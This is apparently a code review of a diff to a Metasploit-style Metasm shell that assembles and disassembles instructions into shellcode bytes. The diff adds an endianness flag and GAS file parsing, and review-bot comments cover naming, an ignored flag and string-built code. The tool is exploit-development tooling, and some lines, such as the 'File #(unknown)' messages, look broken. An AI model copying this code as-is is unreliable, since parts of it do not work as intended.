@@ -32,6 +33,9 @@ require 'metasm' #PowerPC, seems broken for now in metasm #@Arch = ['Ia32','MIPS','PowerPC','ARM','X86_64'] @Arch = ['Ia32','MIPS','ARM','X86_64'] +@Endian = ['little','big'] +@architecture = "" +@endianess = "" def usage $stderr.puts("\nUsage: #{$0} \n" + $args.usage)
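Review bot: `@endianess` misspells endianness, and the same spelling is repeated in the `-e` help text and the `Metasm::…new(:…)` interpolation in the following hunks; renaming it to `@endianness` now, while the name is new, is cheap and stops the typo spreading. Using `""` as the "not given" sentinel for `@architecture` and `@endianess` and testing `.empty?` later works, but `nil` plus a plain truthiness check is the conventional Ruby form and would let `@Endian`, `@architecture`, `@endianess` sit next to `@Arch` with a one-line comment such as `# set from -a/-e; nil means "use the default CPU"`. `def usage` continues outside the hunk.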
@@ -40,7 +44,8 @@ end $args = Rex::Parser::Arguments.new( "-a" => [ true, "The architecture to encode as (#{@Arch.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})"], - "-h" => [ false, "Display this help information" ]) + "-e" => [ true, "The endianess to encode as (#{@Endian.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})" ], + "-h" => [ false, "Display this help information" ]) $args.parse(ARGV) { |opt, idx, val| case opt @@ -48,12 +53,20 @@ $args.parse(ARGV) { |opt, idx, val| found = nil @Arch.each { |a| if val.downcase == a.downcase - String.class_eval("@@cpu = Metasm::#{a}.new") + @architecture = a + found = true + end + } + usage if not found + when "-e" + found = nil + @Endian.each { |e| + if val.downcase == e.downcase + @endianess = e found = true end } usage if not found - when "-h" usage else @@ -61,6 +74,14 @@ $args.parse(ARGV) { |opt, idx, val| end } +unless @architecture.empty? + if @endianess.empty? + String.class_eval("@@cpu = Metasm::#{@architecture}.new") + else + String.class_eval("@@cpu = Metasm::#{@architecture}.new(:#{@endianess})") + end +end + class String @@cpu ||= Metasm::Ia32.new class << self 
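Review bot: In the `@@ -61,6 +74,14 @@` hunk, `-e` given without `-a` is validated and stored by the parser above but then silently ignored: the whole `unless @architecture.empty?` block is skipped and `@@cpu ||= Metasm::Ia32.new` takes over, so a user asking for big-endian output gets the default CPU with no message. Either reject the combination (`usage if @architecture.empty? && !@endianess.empty?`) or document that `-e` only takes effect together with `-a`. The two `String.class_eval("@@cpu = Metasm::#{...}")` strings exist only because `@architecture`/`@endianess` are main-object ivars invisible inside a `class String` body; capturing them first and using `cpu = Metasm.const_get(@architecture)` then `String.class_variable_set(:@@cpu, @endianess.empty? ? cpu.new : cpu.new(@endianess.to_sym))` avoids building code from strings while keeping the whitelist checks in the `-a`/`-e` branches meaningful.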
@@ -98,23 +119,61 @@ class String def decode(base_addr=0, eip=base_addr) decode_blocks(base_addr, eip).to_s end + + def disassemble(str, eip=0) + Metasm::Shellcode.disassemble(@@cpu, str, eip) + end + end +def parse_gas_file(filename) + unless ::File.exist?(filename) + puts "File #(unknown) not found" + return + end + shellcode = "" + puts "Reading file #(unknown)" + ::File.open(filename, "rb") do |f| + f.each_line do |l| + l.gsub!(/#.*$/, "") # Delete comments + l.gsub!(/@.*$/, "") # Delete comments + l.gsub!(/\..*$/, "") # Delete directives + l.gsub!(/(\r|\n)/, '') # Delete newlines... just in case... + next if l.strip.empty? + shellcode << "#{l}\n" + end + end + begin + encoded = shellcode.encode + puts Rex::Text.to_ruby(encoded) + puts encoded.disassemble(shellcode.encode) + rescue Metasm::Exception => e + puts "Error: #{e.class} #{e.message}" + end +end # Start a pseudo shell and dispatch lines to be assembled and then # disassembled. shell = Rex::Ui::Text::PseudoShell.new("%bldmetasm%clr") shell.init_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new) -puts 'type "exit" or "quit" to quit', 'use ";" or "\\n" for newline', '' +puts [ + 'type "exit" or "quit" to quit', + 'use ";" or "\\n" for newline', + 'type "file " to parse a GAS assembler source file', + ''] shell.run { |l| l.gsub!(/(\r|\n)/, '') - l.gsub!(/\\n/, "\n") + l.gsub!(/\\n/, "\n") l.gsub!(';', "\n") break if %w[quit exit].include? l.chomp + if l.chomp.index(/^file (.*)/) + parse_gas_file($1) + next + end next if l.strip.empty? begin